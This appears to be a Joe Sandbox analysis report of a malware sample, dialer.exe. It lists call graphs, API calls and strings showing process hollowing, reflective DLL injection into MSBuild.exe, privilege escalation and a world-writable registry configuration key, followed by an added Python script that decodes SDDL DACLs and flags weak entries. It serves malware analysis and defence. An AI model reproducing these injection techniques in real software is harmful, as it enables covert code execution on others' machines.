HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 
547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 
617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
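The Strings list of this dialer.exe function pairs the SDDL string D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) with SOFTWARE\dialerconfig, and its API list (ConvertStringSecurityDescriptorToSecurityDescriptorW followed by RegSetKeySecurity, then RegSetValueExW fed by GetCurrentProcessId in the execution graph) shows the descriptor being applied to that key before the pid value is written. Decoded, the DACL grants GENERIC_ALL, inherited by subkeys and values (OI and CI), to Authenticated Users as well as Builtin Administrators, so any local account can rewrite the miner's configuration. The following Python is an added example, not part of the Joe Sandbox report: it decodes the DACL portion of an SDDL string and flags allow-ACEs that give write-class rights to broad principals. SDDL_FROM_REPORT is copied from the Strings list above; SDDL_HARDENED and the other test strings are my own constructions.

```python
"""Decode the DACL of an SDDL string and flag ACEs that hand write access to broad principals."""
import re

# Copied from the Strings list of this dialer.exe function (applied via RegSetKeySecurity).
SDDL_FROM_REPORT = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"
# Constructed counterpart, not from the report: admins keep full control, users are read-only.
SDDL_HARDENED = "D:(A;OICI;GA;;;BA)(A;OICI;GR;;;AU)"

ACE_RE = re.compile(r"\(([^)]*)\)")
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "OA": "OBJECT_ACCESS_ALLOWED",
             "OD": "OBJECT_ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE",
          "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "FX": "FILE_GENERIC_EXECUTE", "RC": "READ_CONTROL", "SD": "DELETE",
          "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
WELL_KNOWN_SIDS = {"AU": ("S-1-5-11", "Authenticated Users"), "BA": ("S-1-5-32-544", "Builtin Administrators"),
                   "BU": ("S-1-5-32-545", "Builtin Users"), "WD": ("S-1-1-0", "Everyone"),
                   "IU": ("S-1-5-4", "Interactive Users"), "AN": ("S-1-5-7", "Anonymous"),
                   "SY": ("S-1-5-18", "Local System"), "LS": ("S-1-5-19", "Local Service"),
                   "NS": ("S-1-5-20", "Network Service"), "CO": ("S-1-3-0", "Creator Owner")}

# Principals that effectively mean "any user on the box".
BROAD_PRINCIPALS = {"S-1-5-11", "S-1-1-0", "S-1-5-32-545", "S-1-5-4", "S-1-5-7"}
WRITE_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "KEY_ALL_ACCESS", "KEY_WRITE",
                "FILE_ALL_ACCESS", "FILE_GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER"}
# Numeric rights: GENERIC_ALL | GENERIC_WRITE | WRITE_DAC | WRITE_OWNER | KEY_SET_VALUE | KEY_CREATE_SUB_KEY
WRITE_MASK = 0x10000000 | 0x40000000 | 0x00040000 | 0x00080000 | 0x0002 | 0x0004


def _pairs(field):
    """SDDL packs two-letter codes back to back: 'OICI' -> ['OI', 'CI']."""
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_dacl(sddl):
    """Return (aces, control_flags) for the D: section; raises on a malformed ACE."""
    start = sddl.find("D:")
    if start < 0:
        return [], ""
    body = sddl[start + 2:]
    sacl = body.find("S:")
    if sacl >= 0:
        body = body[:sacl]
    control = body[:body.find("(")] if "(" in body else body   # e.g. "P" or "AI"
    aces = []
    for raw in ACE_RE.findall(body):
        fields = raw.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({raw})")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        aces.append({
            "type": ACE_TYPES.get(ace_type, ace_type),
            "flags": [ACE_FLAGS.get(f, f) for f in _pairs(flags)],
            "rights": int(rights, 16) if rights.lower().startswith("0x")
                      else [RIGHTS.get(r, r) for r in _pairs(rights)],
            "sid": WELL_KNOWN_SIDS.get(sid, (sid, sid)),
        })
    return aces, control


def grants_write(rights):
    """True if a symbolic rights list or a numeric mask contains a write-class right."""
    if isinstance(rights, int):
        return bool(rights & WRITE_MASK)
    return bool(set(rights) & WRITE_RIGHTS)


def weak_aces(aces):
    """Allow-ACEs that give write-class access to a broad principal."""
    return [a for a in aces
            if a["type"] == "ACCESS_ALLOWED" and a["sid"][0] in BROAD_PRINCIPALS
            and grants_write(a["rights"])]


if __name__ == "__main__":
    for label, sddl in (("report", SDDL_FROM_REPORT), ("hardened", SDDL_HARDENED)):
        aces, control = parse_dacl(sddl)
        print(f"{label}: {sddl}  control={control!r}")
        for a in aces:
            print(f"  {a['type']:<15} {','.join(a['flags']):<32} {a['rights']} -> {a['sid'][1]} ({a['sid'][0]})")
        print(f"  weak ACEs: {[a['sid'][1] for a in weak_aces(aces)]}")
```

On the report's string the check flags the Authenticated Users ACE; on the hardened variant nothing is flagged, because the only ACE for a broad principal is read-only. The same decoder can be pointed at any SDDL recovered from a sample or from `Get-Acl` output, and the numeric branch handles ACEs that spell the mask out as 0x… instead of two-letter codes.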

                                                        Control-flow Graph

                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 
81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                        Control-flow Graph

                                                        control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                        Control-flow Graph

                                                        Control-flow graph (rendered graph residue, summarised): function at 0x140002b38-0x140002bf4; blocks call GetProcessHeap, HeapAlloc (twice), K32EnumProcesses, sub_140002540 and SleepEx, with the SleepEx block looping back to the K32EnumProcesses block.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                        Control-flow Graph

                                                        Control-flow graph (rendered graph residue, summarised): function at 0x1400018ac-0x140001912; blocks call OpenProcess, IsWow64Process and CloseHandle.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                        Control-flow Graph

                                                        Control-flow graph (rendered graph residue, summarised): function at 0x140002258-0x140002263; calls sub_14000226c, then ExitProcess.
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmp
